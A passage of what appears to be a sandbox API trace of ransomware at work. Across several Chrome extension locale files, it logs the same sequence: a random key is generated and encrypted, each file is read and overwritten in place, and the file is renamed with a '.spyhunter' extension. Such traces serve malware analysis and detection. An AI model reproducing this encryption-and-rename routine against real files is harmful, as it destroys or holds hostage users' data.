lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0134.600] GetProcessHeap () returned 0x2c0000 [0134.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.600] GetProcessHeap () returned 0x2c0000 [0134.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.600] GetProcessHeap () returned 0x2c0000 [0134.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81bc8 | out: hHeap=0x2c0000) returned 1 [0134.601] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf488 | out: pbBuffer=0x25cf488) returned 1 [0134.601] GetProcessHeap () returned 0x2c0000 [0134.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.601] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf480*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf480*=0x30) returned 1 [0134.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json") returned 157 [0134.601] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.601] GetProcessHeap () returned 0x2c0000 [0134.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.601] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf444, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf444*=0x104, lpOverlapped=0x0) returned 1 [0134.602] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.602] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x25cf444, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf444*=0x104, lpOverlapped=0x0) returned 1 [0134.602] GetProcessHeap () returned 0x2c0000 [0134.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.602] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.603] WriteFile (in: hFile=0xec, lpBuffer=0x25cf484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf444, lpOverlapped=0x0 | out: lpBuffer=0x25cf484*, lpNumberOfBytesWritten=0x25cf444*=0x4, lpOverlapped=0x0) returned 1 [0134.603] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf444, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf444*=0x30, lpOverlapped=0x0) returned 1 [0134.603] CloseHandle (hObject=0xec) returned 1 [0134.603] GetProcessHeap () returned 0x2c0000 [0134.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.603] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.spyhunter") returned 167 [0134.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0134.603] GetProcessHeap () returned 0x2c0000 [0134.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.604] GetProcessHeap () returned 0x2c0000 [0134.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.604] GetProcessHeap () returned 0x2c0000 [0134.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81a40 | out: hHeap=0x2c0000) returned 1 [0134.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf480 | out: pbBuffer=0x25cf480) returned 1 [0134.605] GetProcessHeap () returned 0x2c0000 [0134.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf478*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf478*=0x30) returned 1 [0134.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.605] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0134.605] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.605] GetProcessHeap () returned 0x2c0000 [0134.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.605] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf43c*=0x101, lpOverlapped=0x0) returned 1 [0134.606] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.606] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x25cf43c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf43c*=0x101, lpOverlapped=0x0) returned 1 [0134.606] GetProcessHeap () returned 0x2c0000 [0134.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.606] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.606] WriteFile (in: hFile=0xec, lpBuffer=0x25cf47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf43c, lpOverlapped=0x0 | out: lpBuffer=0x25cf47c*, lpNumberOfBytesWritten=0x25cf43c*=0x4, lpOverlapped=0x0) returned 1 [0134.606] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf43c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf43c*=0x30, lpOverlapped=0x0) returned 1 [0134.607] CloseHandle (hObject=0xec) returned 1 [0134.607] GetProcessHeap () returned 0x2c0000 [0134.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.607] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.spyhunter") returned 166 [0134.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0134.607] GetProcessHeap () returned 0x2c0000 [0134.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.607] GetProcessHeap () returned 0x2c0000 [0134.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.608] GetProcessHeap () returned 0x2c0000 [0134.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81730 | out: hHeap=0x2c0000) returned 1 [0134.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf478 | out: pbBuffer=0x25cf478) returned 1 [0134.609] GetProcessHeap () returned 0x2c0000 [0134.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf470*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf470*=0x30) returned 1 [0134.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0134.609] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.609] GetProcessHeap () returned 0x2c0000 [0134.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.609] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf434, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf434*=0xf3, lpOverlapped=0x0) returned 1 [0134.615] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.615] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf3, lpNumberOfBytesWritten=0x25cf434, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf434*=0xf3, lpOverlapped=0x0) returned 1 [0134.616] GetProcessHeap () returned 0x2c0000 [0134.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.616] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.616] WriteFile (in: hFile=0xec, lpBuffer=0x25cf474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf434, lpOverlapped=0x0 | out: lpBuffer=0x25cf474*, lpNumberOfBytesWritten=0x25cf434*=0x4, lpOverlapped=0x0) returned 1 [0134.616] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf434, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf434*=0x30, lpOverlapped=0x0) returned 1 [0134.616] CloseHandle (hObject=0xec) returned 1 [0134.616] GetProcessHeap () returned 0x2c0000 [0134.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.616] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.spyhunter") returned 166 [0134.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.spyhunter")) returned 1 [0134.617] GetProcessHeap () returned 0x2c0000 [0134.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.617] GetProcessHeap () returned 0x2c0000 [0134.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.617] GetProcessHeap () returned 0x2c0000 [0134.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81420 | out: hHeap=0x2c0000) returned 1 [0134.618] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf470 | out: pbBuffer=0x25cf470) returned 1 [0134.618] GetProcessHeap () returned 0x2c0000 [0134.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.618] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf468*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf468*=0x30) returned 1 [0134.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0134.618] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.619] GetProcessHeap () returned 0x2c0000 [0134.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.619] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf42c*=0x101, lpOverlapped=0x0) returned 1 [0134.619] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.619] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x25cf42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf42c*=0x101, lpOverlapped=0x0) returned 1 [0134.619] GetProcessHeap () returned 0x2c0000 [0134.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.620] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.620] WriteFile (in: hFile=0xec, lpBuffer=0x25cf46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf42c, lpOverlapped=0x0 | out: lpBuffer=0x25cf46c*, lpNumberOfBytesWritten=0x25cf42c*=0x4, lpOverlapped=0x0) returned 1 [0134.620] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf42c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf42c*=0x30, lpOverlapped=0x0) returned 1 [0134.620] CloseHandle (hObject=0xec) returned 1 [0134.620] GetProcessHeap () returned 0x2c0000 [0134.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.620] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.spyhunter") returned 166 [0134.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0134.621] GetProcessHeap () returned 0x2c0000 [0134.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.621] GetProcessHeap () returned 0x2c0000 [0134.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.621] GetProcessHeap () returned 0x2c0000 [0134.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f815a8 | out: hHeap=0x2c0000) returned 1 [0134.622] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf468 | out: pbBuffer=0x25cf468) returned 1 [0134.622] GetProcessHeap () returned 0x2c0000 [0134.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.622] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf460*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf460*=0x30) returned 1 [0134.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0134.622] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.622] GetProcessHeap () returned 0x2c0000 [0134.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.622] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf424*=0xfb, lpOverlapped=0x0) returned 1 [0134.623] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.623] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x25cf424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf424*=0xfb, lpOverlapped=0x0) returned 1 [0134.623] GetProcessHeap () returned 0x2c0000 [0134.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.624] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.624] WriteFile (in: hFile=0xec, lpBuffer=0x25cf464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf424, lpOverlapped=0x0 | out: lpBuffer=0x25cf464*, lpNumberOfBytesWritten=0x25cf424*=0x4, lpOverlapped=0x0) returned 1 [0134.624] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf424, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf424*=0x30, lpOverlapped=0x0) returned 1 [0134.624] CloseHandle (hObject=0xec) returned 1 [0134.624] GetProcessHeap () returned 0x2c0000 [0134.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.624] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.spyhunter") returned 166 [0134.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.spyhunter")) returned 1 [0134.625] GetProcessHeap () returned 0x2c0000 [0134.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.625] GetProcessHeap () returned 0x2c0000 [0134.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.625] GetProcessHeap () returned 0x2c0000 [0134.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81110 | out: hHeap=0x2c0000) returned 1 [0134.627] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf460 | out: pbBuffer=0x25cf460) returned 1 [0134.627] GetProcessHeap () returned 0x2c0000 [0134.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.627] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf458*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf458*=0x30) returned 1 [0134.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: 